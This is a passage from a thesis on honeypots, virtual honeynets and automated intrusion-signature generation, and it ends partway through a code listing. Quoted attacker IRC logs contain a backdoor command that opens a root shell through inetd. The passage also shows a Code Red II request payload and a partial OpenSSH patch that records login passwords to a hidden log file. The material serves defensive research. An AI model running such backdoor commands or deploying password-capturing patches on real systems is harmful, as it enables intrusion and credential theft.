exploits, analyses them, correlates the events that occurred and generates automated
proactive responses to the newly identified weaknesses. This thesis aims to achieve
part of this idea. Our research will focus on Intrusion Detection and the creation of
an automated signature engineering system, as an active response for mitigation.
We have divided the research into 2 main phases:
1. Deployment of Honeypot sensors in Honeynets to collect real-time data on
intrusions and attacks.
2. Automated analysis of attack data to identify, classify and cluster attacks to serve
as input for signature generation.
3.6. Honeypots and Honeynets
3.6.1. Who, What, Where, Why and How?
The first step towards achieving my research goals involved setting up Honeypot sensor
nodes. These sensors will aid us in understanding who the attackers are. What methods
and tools do they use to attack? Where do they get the knowledge and tools from? Why
do they attack us? How do they organize and gain access to so many victim machines
simultaneously?
3.6.2. Honeypots
A Honeypot is generally defined as a network security resource whose value lies in it
being scanned, attacked, compromised, controlled and misused by an attacker to
achieve his malicious goals.
Lance Spitzner [1] defines a Honeypot as follows: “A Honeypot is an information system
resource whose value lies in unauthorized or illicit use of that resource.”
3.6.2.1. Motivation and Concept
Most network security tools, for example firewalls and IDS, are passive in nature. They
operate on the rules and signatures available in their database, which is why detection
is limited to the set of available rules. Any activity that the rules do not describe
goes under the radar and is thus undetected. Honeypots by design allow you to take the
initiative; they turn the tables on the bad guys. A Honeypot has no production value and
no authorized activity, so any interaction with it is most likely malicious in intent.
Honeypots do not solve the security problem but provide data and knowledge that help the
system administrator to enhance the overall security of his network. This knowledge can
be used as input for early warning systems. Over the years researchers have successfully
isolated and identified worms and exploits using Honeypots. These are then used for
signature and rule development.
Honeypots are capable of logging far more information than any other available security
tools. They give us an insight into attacks and attackers, their skill level, their
organization as groups or individuals, and their motives and tactics. Thus, almost every
aspect is logged and can be made auditable. Honeypots effectively empower us to
study malicious hackers under a microscope. This can be demonstrated with a few
examples:
3.6.2.2. Classic Examples
:j@ck :hehe come with yure ip i`ll add u to the new 40 bots
:j@ck :i owned and trojaned 40 servers of linux in 3 hours
:j@ck ::)))))
:j1ll :heh
:j1ll :damn
:j@ck :heh
:j1ll :107 bots now
:j@ck:yup
[1]
Table 2: Honeypot: Classic Examples
3.6.2.3. Discussing Exploits
:_pen :do u have the syntax
:_pen :for
:D1ck :yeah
:_pen :sadmind exploit
:_pen :?
:D1ck :lol
:D1ck :yes
:_pen :what is it
:D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p]
:_pen : what do i do for -c
:D1ck :heh
:D1ck :u dont know?
:_pen :no
:D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob"
[1]
Table 3: Honeypot: Discussing Exploits
3.6.2.4. Example: Leaves Worm
• On June 19, 2001 a sudden rise of scans for the Sub7 Trojan (port 27374) was
detected.
• An infected emulated Windows Honeypot revealed that a worm was pretending to be a
Sub7 client and attempting to infect systems.
• Matt Fearnow and the Incidents.org team identified it as the W32/Leaves worm.
• The National Infrastructure Protection Center (NIPC) was informed. CERT advisory
July 3, 2001 [1]
Table 4: Honeypot: Leaves Worm
3.6.2.5. Example: Code Red II Worm
• The Code Red II worm (MS IIS indexing exploit) was analysed by Ryan Russell at
SecurityFocus.com.
• A typical signature of the Code Red II worm would appear in a web server log as:
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
This worm tried to infect other computers at random, along with machines on the same
subnet as the infected machine.[1]
Table 5: Honeypot: Code Red II Worm
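The log entry above suggests how such a request could be recognised automatically. The following is a minimal sketch only: the regular expression, the threshold of 100 filler characters and the function name are assumptions made for illustration, not a signature taken from [1] or from any IDS rule set.

```python
import re

# Assumed pattern: a request for /default.ida followed by a long run of the
# filler character 'X' and at least one %uXXXX-encoded word. The threshold of
# 100 filler characters is illustrative.
CODE_RED_II = re.compile(r"GET /default\.ida\?X{100,}(?:%u[0-9a-fA-F]{4})+")


def looks_like_code_red_ii(log_line: str) -> bool:
    """Return True if the request line resembles the Code Red II probe."""
    return CODE_RED_II.search(log_line) is not None


# Hypothetical log lines used to exercise the check.
probe = "GET /default.ida?" + "X" * 224 + "%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0"
benign = "GET /index.html HTTP/1.0"

print(looks_like_code_red_ii(probe))
print(looks_like_code_red_ii(benign))
```

A fixed pattern of this kind only recognises the variant it was written for, which is one reason why signatures need to be regenerated as attacks change.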
3.6.2.6. Example: Solaris dtspcd exploit
• A Solaris Honeypot captured a dtspcd exploit, an attack never seen before.
• On November 12, 2001, the CERT Coordination Center had released an advisory for
the CDE Subprocess Control Service or, more specifically, dtspcd.
• The exploit code was isolated and the attack was detected. This was the first
incident in which a Honeypot was used to identify and document an unknown attack.
[1]
Table 6: Honeypot: Solaris dtspcd exploit
3.6.3. Honeynets
A Honeynet is a special kind of high-interaction Honeypot. Honeynets extend the concept
of a single Honeypot to a highly controlled network of Honeypots. A Honeynet is a
specialized network architecture configured to achieve Data Control, Data Capture and
Data Collection. This architecture creates a highly controlled network, in which one can
control and monitor all kinds of system and network activity. Honeypots are then placed
within this network. A basic Honeynet comprises Honeypots placed behind a transparent
gateway, the Honeywall. Acting as a transparent gateway, the Honeywall is undetectable
by attackers and serves its purpose by logging all network activity going into or out of
the Honeypots.
3.6.3.1. Data Control
Data control is the containment of activity within the Honeynet. It determines the means
by which the attacker's activity is restricted so that other systems and resources
cannot be damaged or abused through the Honeynet. This demands a great deal of planning,
as we need to give the attacker enough freedom to learn from his moves and at the same
time not let our resources (Honeypots and bandwidth) be used to attack, damage and abuse
other hosts on the same or different subnets. The administrators of the Honeynet
carefully study and formulate a policy on the attacker’s freedom versus containment, and
implement it so as to achieve maximum data control without the Honeynet being discovered
or identified by the attacker as a Honeypot. Various mechanisms to achieve data control
are available, such as firewalls, counting outbound connections, intrusion detection
systems, intrusion prevention systems and bandwidth restriction. Data control mechanisms
are implemented according to our requirements and the risk thresholds defined.
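One of the mechanisms listed above, counting outbound connections, can be sketched as a per-Honeypot limit within a sliding time window. This is an illustrative sketch and not the Honeywall's implementation: the class name, the parameters and the example addresses are assumptions.

```python
import time
from collections import defaultdict, deque
from typing import Optional


class OutboundLimiter:
    """Allow at most `limit` outbound connections per Honeypot per time window."""

    def __init__(self, limit: int, window_seconds: float) -> None:
        self.limit = limit
        self.window = window_seconds
        # Honeypot IP -> timestamps of the connections that were allowed.
        self._allowed = defaultdict(deque)

    def allow(self, honeypot_ip: str, now: Optional[float] = None) -> bool:
        now = time.time() if now is None else now
        stamps = self._allowed[honeypot_ip]
        # Forget connections that have fallen out of the time window.
        while stamps and now - stamps[0] >= self.window:
            stamps.popleft()
        if len(stamps) >= self.limit:
            return False  # over the threshold: the gateway would drop or log this
        stamps.append(now)
        return True


# Hypothetical policy: two outbound connections per minute per Honeypot.
limiter = OutboundLimiter(limit=2, window_seconds=60)
decisions = [limiter.allow("10.0.0.5", now=t) for t in (0.0, 1.0, 2.0, 61.0)]
print(decisions)
```

A low limit contains the attacker more tightly but makes the restriction easier to notice, which is the freedom versus containment trade-off described above.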
3.6.3.2. Data Capture
Data Capture involves the capturing, monitoring and logging of all threats and attacker
activities within the Honeynet. Analysis of this captured data provides an insight into
the tools, tactics, techniques and motives of the attackers. The concept is to achieve
maximum logging capability at all nodes and hence log any kind of attacker interaction
without the attacker knowing it. This type of stealthy logging is achieved by setting up
tools and mechanisms on the Honeypots to log all system activity and by providing
network logging capability at the Honeywall. Every bit of information is crucial in
studying the attacker, whether it is a TCP port scan, a remote or local exploit attempt,
a brute force attack, an attack tool downloaded by the hacker, local commands run,
communication carried out over encrypted and unencrypted channels (mostly IRC) or an
outbound connection attempt made by the attacker. All of this should be logged and sent
to a remote location to avoid any loss of data due to system damage caused by attackers,
such as data being wiped from disk. To prevent the attacker from detecting this
activity, data masking techniques such as encryption should be used.
3.6.3.3. Data Collection
Once data is captured, it is securely forwarded to a centralized data collection point.
This allows data captured from numerous Honeynet sensors to be centrally collected for
analysis and archiving. Implementations may vary depending on the requirements of the
organization; however, the latest implementations incorporate data collection at the
Honeywall gateway.
3.6.3.4. Honeynet Architectures
There are 3 Honeynet architectures, namely:
• Generation I
• Generation II
• Generation III
3.6.3.4.1. Generation I Architecture
Gen I Honeynets were developed in 1999 by the Honeynet Project. Their purpose was to
capture attackers' activity while giving them the feel of a real network. The
architecture is simple, with a firewall aided by an IDS placed at the front and
Honeypots placed behind it. Unfortunately, this makes it detectable by attackers.
Figure 5: Gen I Honeynet Architecture [12]
3.6.3.4.2. Generation II and III Architecture
Gen II Honeynets were first introduced in 2001 and Gen III Honeynets were released at
the end of 2004. Gen II Honeynets were designed to address the issues of Gen I
Honeynets. Gen II and Gen III Honeynets have the same architecture. The only difference
is that Gen III Honeynets bring significant improvements in deployment and management,
along with the addition of a Sebek server built into the Honeywall.
A radical change in architecture was brought about by the introduction of a single device
that handles the data control and data capture mechanisms of the Honeynet, called the
IDS Gateway or, to use the marketing terminology, the Honeywall. By making the
architecture more “stealthy”, attackers are kept longer and thus more data is captured.
There was also a major thrust in improving the Honeypot layer of data capture with the
introduction of a new UNIX and Windows based data
Figure 6: Generation III Honeynet Architecture [12]
3.6.3.5. Virtual Honeynet
Virtualization is a technology that allows multiple virtual machines to run on a single
physical machine. Each virtual machine can be an independent operating system
installation. This is achieved by sharing the physical machine's resources, such as CPU,
memory, storage and peripherals, across multiple environments through specialized
software. Thus multiple virtual operating systems can run concurrently on a single
physical machine.
A virtual Honeynet is a solution that allows a complete Honeynet to run on a single
computer. We use the term virtual because all the different operating systems placed in
the Honeynet appear to be running on their own, independent computers.
3.7. Research Challenge # 1
3.7.1. Architecture and Design Considerations in Virtual Honeynets
3.7.2. Introduction
The Honeynet Project provides documentation on deploying Generation 3 virtual
Honeynets. This documentation was developed by the Pakistan Honeynet Project
Chapter as a step-by-step How-To for deploying virtual Honeynets using VMware. It serves
as a standard template for anyone who wants to deploy a virtual Honeynet using VMware
and Honeywall Roo and has thus become a de facto document:
http://www.Honeynet.pk/Honeywall/roo/page2b.htm.
During the literature review it was decided to use this document as the standard
template for our project's implementation. The Generation 3 architecture demands 3
interfaces on the Honeywall: one is used as the management interface while the other two
are used as bridged interfaces. In VMware, a bridged interface like vmnet0 has direct
access to the physical interface, so 2 such interfaces bridge the same LAN segment,
whereas the requirement was to bridge between two LAN segments, i.e. the external
network segment pointing to the router and the internal network segment on which the
Honeypots are placed. It was observed that the Honeynet design suggested by the website
had configured both the eth0 and eth1 interfaces as VMware bridged interfaces and eth2
as a VMware host-only interface. This caused a loop in the Honeywall, and the Honeypot
LAN segment was bypassed. This problem was reported to the Pakistan Honeynet Project,
who then accepted it and updated the design on their website.
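The interface problem described above can be expressed as a simple consistency check on the mapping between Honeywall interfaces and virtual networks. This is a minimal sketch and not part of the Honeywall or VMware tooling: the function name, the dictionary layout and the labels vmnet1 and vmnet2 are assumptions, and the second layout is only one possible arrangement with separate segments, not necessarily the published fix.

```python
from typing import Dict, Tuple


def bridges_same_segment(
    attachments: Dict[str, str],
    bridge_pair: Tuple[str, str] = ("eth0", "eth1"),
) -> bool:
    """Return True if both bridge interfaces attach to the same virtual network."""
    external, internal = bridge_pair
    return attachments[external] == attachments[internal]


# Layout as described in the text: eth0 and eth1 both on the bridged network.
reported = {"eth0": "vmnet0", "eth1": "vmnet0", "eth2": "vmnet1"}

# Hypothetical layout with the Honeypots on their own segment (assumption).
separated = {"eth0": "vmnet0", "eth1": "vmnet1", "eth2": "vmnet2"}

print(bridges_same_segment(reported))
print(bridges_same_segment(separated))
```

A check of this kind flags the reported layout, because the Honeywall would then be bridging one LAN segment to itself instead of joining the external segment to the Honeypot segment.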
3.8. Research Challenge # 2
3.8.1. Intrusion Detection
Intrusion detection is the art of detecting malicious activity in a computer related
system [76]. Malicious activities and intrusion techniques are interesting from a
computer security perspective. Analysis of traffic and events reveals that intrusion is
different from the normal behaviour of system usage, and hence anomaly detection
techniques are applicable in the intrusion detection domain. Denning [74] classified
intrusion detection systems into 1) host based and 2) network based intrusion detection
systems. K. Scarfone et al. [80] classified intrusion detection systems by their
detection methodology (signature matching, anomaly detection or stateful protocol
analysis), location (on a host, a wired network or a wireless network) and capability
(simple detection or active attack prevention).
3.8.2. Intrusion Detection Problem
Conventional intrusion detection and prevention system solutions defend a network's
perimeter by using packet inspection, signature detection and real-time blocking.
Although these techniques are effective as a static defence, they fail to cope with the
dynamic nature of threats faced today.
Signature matching techniques are used to identify attacks by comparing the contents
of packets with a set of signatures or rules that describe the known attack. These
techniques can become unreliable against ciphered traffic and self modifying malware
or other evasion techniques. [81]
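The signature matching step described above can be illustrated with a minimal Python sketch. The two signatures and the sample request are hypothetical and are not taken from any real rule set; XOR with a fixed key merely stands in for ciphered traffic.

```python
from typing import Dict, List

# Hypothetical signatures: name -> byte pattern that must occur in the payload.
SIGNATURES: Dict[str, bytes] = {
    "directory-traversal": b"../../",
    "shell-invocation": b"/bin/sh",
}


def match_signatures(payload: bytes,
                     signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Return the names of all signatures whose pattern occurs in the payload."""
    return [name for name, pattern in signatures.items() if pattern in payload]


plain = b"GET /../../etc/passwd HTTP/1.0"
# The same request with every byte XORed with a key stands in for ciphered traffic.
ciphered = bytes(b ^ 0x5A for b in plain)

print(match_signatures(plain))     # the traversal pattern is visible
print(match_signatures(ciphered))  # the same attack no longer matches
```

The second call returns no match although the request is the same attack, which is the weakness of content signatures against ciphered or self modifying payloads noted above.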
Stateful protocol analysis techniques involve matching of each connection with an
existing template that acts as a profile for a given protocol. Any deviations from this
profile are immediately reported. The effectiveness of this technique can be seen in
areas such as horizontal network scanning or host behaviour profiling. Conversely,
attacks that conform to normal protocol behaviour tend to go unnoticed [81].
3.8.3. Intrusion Detection Signatures
A signature is a pattern or characteristic used for identification and it is used to
“describe the characteristic elements of an attack” [52]. Intrusion detection systems
identify attacks based on signature matches. These signatures are created after
analysing attack traffic data. In the absence of signature writing standards, it has been
observed that signatures vary from implementation to implementation [52, 17].
A signature is considered effective based on its ability to narrow down the attack
characteristics and be elastic enough to detect any kind of variations in the attack [52,
17]. Examples of some well known signature-based intrusion detection systems include
Bro and Snort [17].
3.8.4. Automated Signature Engineering
Signature generation is a laborious process. It may require hours of analysis until a final
effective signature can be produced. This analysis is based on some unique
characteristics visible within the traffic. Automating this process will be ideal in saving an
enterprise from an imminent attack. A requirement is that a system should intelligently
perform traffic analysis to identify unique characteristics that can serve as a key in
generating signatures for intrusion detection systems.
Chapter 4: Overview of Related Works
4.1. Honeypots as attack detection and learning tools
Honeypots began as an idea to study and isolate black hat hackers. The requirement to
learn and profile the enemy has always been an interesting area for security
researchers. The concept has been around for some time in different forms and
implementations until it recently evolved into a well defined and documented solution.
This was followed by the development of various commercial products. It is, as yet, not
clear as to who came up with the word “Honeypot” for such projects; however the core
concept remained the same. Many experts believe that the most primitive set of
documents available on the concept of Honeypots were Clifford Stoll's “The Cuckoo's
Egg” [2] and Bill Cheswick's "An Evening with Berferd in Which a Cracker Is Lured,
Endured, and Studied" [3]. In both papers the researchers had a chance to come face to
face with an attacker who gained access to their system and were then presented with
various types of data to study the attacker’s responses. This was essentially a proof of
concept that it was possible to learn from an attacker in such a way that the community
can benefit from it. This led to an effort to have better logging mechanisms and tools for
studying attacker tactics.
In 1999, Lance Spitzner, the founder of The Honeynet Project [4], started work in the
area of Honeypots. In a very short span of time the Honeynet Project contributed a
series of publications focused on definition, development, architecture and organization
of Honeypots. Researchers in the Honeynet Project have published their findings and
experiences with their Honeypots over a number of years. The most notable book in this
regard is “Honeypots, Tracking Hackers” [1]. This book gives us a deep insight into
Honeypots and is the first compilation of Honeypot based books. This was followed by
“Know Your Enemy: Learning about Security Threats” published by the Honeynet
Project in 2004.
The era of virtualization had its impact on security and Honeypots. The community
responded, marked by the fine efforts of Niels Provos (founder of honeyd) and Thorsten
Holz for their excellent book “Virtual Honeypots: From Botnet Tracking to Intrusion
Detection” in 2007 [6]. Papers on Virtual Honeynets were published by the Honeynet
Project in early 2003, whilst the year 2004 marked the start of a new type of Honeypot
known as the client Honeypot. Kathy Wang's “honeyClient” became the first publicly
available Client Honeypot tool. Generation III Honeynets also emerged in 2004-2005
and Honeywall CDROM version 2 “Roo [22]” became the first publicly available tool
based on Generation III technology. The road onwards has seen many improvements
and enhancements to the functional components of a Honeynet, especially with respect
to the tools for data analysis. There has been a significant shift of focus from Honeynets
to client Honeypots and then towards virtual Honeynets. A significant amount of work is
being carried out on client Honeypot based developments and on enhancing the capabilities
of existing Honeynet technologies.
Our system will incorporate existing Honeynet technology and will be set up in a virtual
environment using VMware ESX server. This will give us another dimension of valuable
data on the state of the Honeypot as it is under attack.
4.2. Automated Signature Engineering using Honeypots
The existence of complex self-similar patterns in internet traffic was first revealed in
work done by Leland et al. [73]. Multiple invariant substrings must often be present in all
variants of worm payload [54]. The substrings correspond to return addresses, protocol
framing, and poorly obfuscated code [53]. Generation of a short single substring
signature for all worm instances can result in high false positive rates [54]. Systems
based on pattern-based analysis extract common byte patterns across suspicious flows,
to generate signature for novel internet worms. Examples of such systems include
EarlyBird [56], Honeycomb [53], and Autograph [55]. A single signature is used to match
all worm instances based on unique substrings in the payload. These substrings are
considered invariant across worm connections [54]. Such systems may suffer from a
relatively high false positive and high false negative rate [54].
Classification of signatures for polymorphic worms can be done under two main
categories [53, 54, 55, 56]:
1. Content-based: Detect similarity in different instances of byte sequences to
characterize a given worm.
2. Behaviour-based: Characterization by perceiving the semantics of byte sequences.
We would like to incorporate both approaches in our research.
Honeypots provide us with insightful information for intrusion and attack analysis. Pouget
et al [65] analysed traffic in Honeypots to identify root causes of frequent processes.
Observed traffic was organized based on the port sequence. This data was then
clustered using association rules mining [64]. “Phrase distance” was then implemented
on the result. Levin et al. explained the use of Honeypots to extract particulars of a
worm that can be analysed to generate signatures [57]. Honeycomb [52] was one of the
first implementations of an automated signature generator. It was implemented as a
Honeyd [58] plug-in. Honeycomb incorporated the longest common substring (LCS)
algorithm on connection pairs to determine common byte sequences. It generates
signatures consisting of a single, long substring of a worm’s payload. This inhibits its
capability to detect all polymorphic worm instances. Julisch [66] defined a method that
clustered intrusion alarms for the purpose of discovering the root cause of an alarm.
The system then generated a generalized alarm for each cluster. Kim et al [55]
explained the Autograph system as a content-based filtering system for automated
signature generation to detect worms. Autograph is implemented at a DMZ that includes
benign traffic. Suspicious TCP flows are identified by content matching and are then
forwarded to COPP as input. Content based payload partitioning (COPP) is an
algorithm based on Rabin fingerprints. Repeated byte sequences are located by
partitioning the payload into content blocks. Autograph also generates one long
continuous substring of a worm’s payload as a signature. Thus any variation in a worm
cannot be detected. S. Singh et al [56] presented the Earlybird system. Earlybird tries to
identify new worms by exploiting common characteristics among them. This system
measures content prevalence in packets at the DMZ. This is carried out by counting the
diverse sources and destinations coupled with high frequency strings in the payload.
The system distinguishes benign content from epidemic content. Earlybird also
generates a single, contiguous substring of a worm’s payload as a signature. These
signatures are not effective in matching all polymorphic worm instances. Content-based
systems like Honeycyber, Polygraph, Hamsa and LISABETH [62, 59, 60, 61]
generate automated signatures for polymorphic worms. The commonality between
these systems is as follows: There are several distinct substrings that are often present
in variants of polymorphic worm payloads even if the payload changes in every
infection. All these systems capture packets from a router, thus these systems may find
multiple polymorphic worms, each addressing a different vulnerability. This makes
it difficult to find distinct contents shared amongst polymorphic worms. One instance of
a worm is sent out which later on attempts to change its payload on every instance of
infection. In order to capture all polymorphic worm instances, we need to observe the
polymorphic worm while it interacts with hosts.
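The longest common substring step that Honeycomb applies to connection pairs can be sketched in Python as follows. This is a minimal illustration using a textbook dynamic-programming formulation, not Honeycomb's actual implementation, and the two payloads are invented for the example.

```python
def longest_common_substring(a: bytes, b: bytes) -> bytes:
    """Return the longest contiguous byte sequence shared by a and b.

    Dynamic programming over prefix pairs: O(len(a) * len(b)) time,
    O(len(b)) memory.
    """
    best_len, best_end = 0, 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        curr = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                # Extend the common run that ended at a[i-2], b[j-2].
                curr[j] = prev[j - 1] + 1
                if curr[j] > best_len:
                    best_len, best_end = curr[j], i
        prev = curr
    return a[best_end - best_len:best_end]


# Two hypothetical flows carrying the same exploit with different padding.
flow_a = b"AAAA GET /vuln.cgi?x=\xde\xad\xbe\xef BBBB"
flow_b = b"CCCC GET /vuln.cgi?x=\xde\xad\xbe\xef DDDD"

candidate_signature = longest_common_substring(flow_a, flow_b)
print(candidate_signature)
```

A single substring of this kind is exactly what a polymorphic worm breaks up: once the invariant parts are separated by changing bytes, only short fragments remain common, which is why the later systems look for several distinct substrings instead.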
Honeycyber [62] utilizes “Double-Honeynet” method to detect polymorphic worms and
collect all their instances. It is based on an intrusion detection policy of waiting for attackers to
attack the network [62]. The approach is to use high interaction Honeypots as virtual
machines for both inbound and outbound Honeypots. The proposed method makes it
possible to capture all worm instances and then forward these instances to the
Signature Generator which generates signatures, using a particular algorithm. Sommer
and Paxson [63] proposed adding connection level context to signatures to reduce false
positives. Christodorescu et al. [67] defined a semantics aware methodology to detect
malicious traits in x86 binaries. The algorithm used incorporates semantics of x86
instructions that are executed.
Yegneswaran et al [70] described the Nemean system. This system incorporates
protocol semantics into the signature generation algorithm. This gives the system a new
dimension and makes it capable of handling a broader class of attacks, giving it a wider
coverage for dealing with polymorphic worms. In “An Automated Signature-Based
Approach against Polymorphic Internet Worms”, Yong Tang and Shigang Chen [71]
defined a system to detect new worms and generate automated signatures. This system
implemented “double-Honeypots” to capture worm payloads. The arrangement
proposed a high-interaction Honeypot for inbound, while a low-interaction Honeypot for
outbound traffic. Being a low-interaction Honeypot, the outbound component could not
make outbound connections, thus inhibiting its capabilities for capturing worm payloads.
In “Automated Web Patrol with Strider HoneyMonkeys”, Yi-Min Wang et al. [72]
developed an automated web patrol system, “HoneyMonkeys”. This system
automatically identifies and monitors malicious web sites that attack their victims with
drive-by downloads. Such websites install malware programs without the user’s
consent. This is carried out by exploiting browser vulnerabilities. Their approach was to
create a system that actively mimics the actions of a user browsing the Web. Special
programs called “monkey programs” run a browser similar to that of a human user. The
browsers can be configured to run with fully updated software or without specific
updates in order to identify exploit sites. The attacks with the greatest impact
are then analyzed. On detection of a zero-day exploit, HoneyMonkey reports all
URLs to the Microsoft Security Response Center. The information is then shared with
the enforcement team and the groups owning the software. The vulnerability is then
thoroughly investigated to determine the most appropriate course of action. With its
intrusion prevention oriented policy Honeymonkey makes an effort to fight back [62].
The HoneyMonkey system is limited to web based technologies and protocols only.
4.3. Anomaly Detection
Anomaly detection is the art of finding patterns in data that do not conform to expected
behaviour or models [75]. The approach is to build models of normal data and detect
deviations in observed data. Denning [74] proposed application of Anomaly detection to
intrusion detection and computer security in 1987. Since then it has been an active area
of research.
Anomaly detectors build models of acceptable behaviour and then raise an alarm if any
deviations from the model are observed. Anomaly detection techniques for detecting
port scans have been explored in [68, 69]. Experience has revealed that balancing
generality and specificity is extraordinarily difficult in anomaly detection systems,
resulting in a high false-positive rate.
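The model-then-deviation idea can be made concrete with a minimal Python sketch. It assumes a single hypothetical feature (the number of distinct destination ports a host contacts per minute) and a simple z-score test; neither the feature nor the threshold is taken from the cited systems.

```python
from statistics import mean, stdev
from typing import List, Tuple


def fit_baseline(samples: List[float]) -> Tuple[float, float]:
    """Model of acceptable behaviour: mean and sample standard deviation."""
    return mean(samples), stdev(samples)


def is_anomalous(value: float, baseline: Tuple[float, float],
                 threshold: float = 3.0) -> bool:
    """Raise an alarm when the value deviates from the model by more than
    `threshold` standard deviations."""
    mu, sigma = baseline
    if sigma == 0:
        return value != mu
    return abs(value - mu) / sigma > threshold


# Hypothetical training data: distinct destination ports per minute.
normal_minutes = [3, 4, 2, 5, 3, 4, 3, 2, 4, 3]
baseline = fit_baseline(normal_minutes)

print(is_anomalous(4, baseline))                  # ordinary minute
print(is_anomalous(250, baseline))                # port-scan-like burst
print(is_anomalous(4, baseline, threshold=0.5))   # overly specific model
```

The last call shows the generality versus specificity trade-off mentioned above: tightening the threshold so that subtle attacks are caught also turns an ordinary observation into a false positive.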
The architecture of a generic anomaly detection system comprises three main
components: (1) the sensor subsystem, (2) the modelling subsystem and (3) the detection
subsystem [78].
4.4. Network Behavioural Analysis (NBA)
Behaviour refers to the actions or reactions of an object or organism, usually in relation
to the environment. Behaviour can be conscious or subconscious, overt or covert, and
voluntary or involuntary [77].
A behavioural model is a representation of characteristics that are consistent with
the observed object or organism.
M. Rehák et al. [81] define Network behavioural analysis as:
“An intrusion detection technique that uses the patterns in network-traffic structures and
properties to identify possible attacks and technical problems with minimal impact on
user data privacy. The analysis is not based on content of the transferred information.”
Shu Yun et al [79] define NBA as an industry buzz word for a network anomaly
detection system.
NBA solutions watch what's happening inside the network, aggregating data from many
points to support offline analysis. NBA systems create profiles or benchmarks for
normal traffic. These profiles are then compared with the monitored network traffic.
Alarms are generated when the system detects unknown, new or unusual patterns that
might indicate the presence of a threat. This can be trends in bandwidth and protocol
use. Network behaviour analysis is particularly good for spotting new malware and zero
day exploits.
NBA tools can greatly help a network administrator minimize the labour and time
involved in locating and resolving problems. Today it is being used as an enhancement
to the protection provided by the network's firewall, intrusion detection system, antivirus
software and spyware-detection program.
Chapter 5: Research Questions
The research questions for our studies can be grouped into two main areas. The first
area relates to the setup of an environment to detect intrusions and learn from the
intruders. The second area is concerned with extracting sufficient information from the
system, to be able to propose a proactive response in the form of a signature.
Part I:
• Question # 1: How to collect information on the attackers? Their tools? Their
tactics? Their techniques? Their motives? Is it possible to stay one step ahead of
them?
• Question # 2: Which technology can be used to effectively and efficiently carry
out detection in depth?
• Question # 3: Can we virtualise such an environment to save cost and yet be
able to maintain stealth from the attackers?
Part II:
• Question # 1: How to intelligently and effectively identify an intrusion and extract
enough information from it to be able to generate automated signatures
effectively?
• Question # 2: Can we identify and foretell intrusions by observing traffic patterns
and payload content?
• Question # 3: Can we identify and foretell intrusions by observing patterns in
system events?
• Question # 4: How to correlate system and network events to recreate a valid
snapshot of the attack?
• Question # 5: How to test the effectiveness of the technique and its result?
Chapter 6: Methodology Review
In order to address these research questions a series of research methods will be
adopted. In this section, details of the methodologies adopted will be described.
6.1. Proposed system for Virtual Honeynet Architecture Problem
6.1.2. Methodology and Discussion
Figure 7: Proposed Virtual Honeynet Architecture
Similar problems were faced and discussed by people from all over the globe who
wanted to implement a similar virtual Honeynet project. We shared and discussed our
findings with the community on the Honeywall project mailing list. After necessary
testing a design was chalked out and followed for the project implementation. After
successful results it was decided to publish the improved design. This design proposes
3 interfaces for the Honeywall such that:
1. vmnet0 is a VMware bridge interface pointing towards the router (as shown in
the figure above).
2. vmnet1 is a VMware host-only interface leading to the internal LAN segment where
the Honeypot is kept (as shown in the figure above).
3. vmnet2 is a VMware bridge interface that is firewalled and accessible for remote
management purposes (SSH and Walleye).
Interfaces 1 and 2 are picked up by Honeywall ROO as eth0 and eth1 and are used for
bridging. Interface 3 is used for remote management. As shown in figure 8, the red
boxes indicate the publicly assigned IP addresses. In this case these belong to the host
machine's eth0 interface, the virtual machine's Honeywall management interface (i.e.
interface 3) and the Honeypots (1, 2 or many). The remote management interface can be
routed to an internal subnet; for our implementation we assigned it a public IP but restricted
access to specific IPs (via Roo), and then only via SSH port forwarding into that
subnet. This project was implemented successfully with one physical gigabit
Ethernet interface. Another physical interface could have been used by binding it with
the remote management interface.
6.1.3. Ubuntu as Honeypot
Ubuntu 8.04 was used as a Linux based Honeypot for our implementation. The concept
was to setup an up-to-date Ubuntu server, configured with commonly used services
such as SSH, FTP, Apache, MySQL and PHP and study attacks directed towards them
on the internet. Ubuntu, being one of the most widely used Linux distributions, can prove to be a
good platform to study zero day exploits. It also becomes a candidate for malware
collection and a source to learn hacker tools being used on the internet. Ubuntu was
successfully deployed as a virtual machine and setup in our Honeynet with a host-only
virtual Ethernet connection. The Honeypot was made sweeter i.e. an interesting target
for the attacker by setting up all services with default settings, for example SSH allowed
password based connectivity from any IP on default port 22, users created were given
privileges to install and run applications, Apache index.html page was made remotely
accessible with default errors and banners, MySQL default port 3306 was accessible
and outbound connections were allowed but limited.
In order to obtain maximum information on the attacker's interaction with the Honeypot,
special measures were taken. These include patching system services to log a greater
deal of information than is logged by default. OpenSSH logs basic information on all
SSH login attempts. This includes the date and time stamp, the IP of the attacker, the
username tried by the attacker and whether the attempt was successful or not. The
passwords tried are not logged, as a security breach in the system log directory could put
at stake all user accounts that connected via SSH. Ethical issues also demand not
logging user passwords. These are among the reasons OpenSSH doesn’t log user
passwords by default. We discovered that it was possible to simply patch the “auth-passwd.c”
source file from the OpenSSH sources so that passwords are logged alongside the
other information and appended to a file. Hence, adding 5-10 lines of C code and
recompiling the OpenSSH sources resulted in a customized OpenSSH daemon capable of
logging passwords.
        result = sys_auth_passwd(authctxt, password);
        if (authctxt->force_pwchange)
                disable_forwarding();
+       /* Honeypot patch: record every failed password attempt. */
+       if (!result)
+       {
+               FILE *cookiemonster;
+               cookiemonster = fopen("/var/log/.hplaser7l/hpsshd_logged", "a");
+               if (cookiemonster != NULL)
+               {
+                       chmod("/var/log/.hplaser7l/hpsshd_logged", 0600);
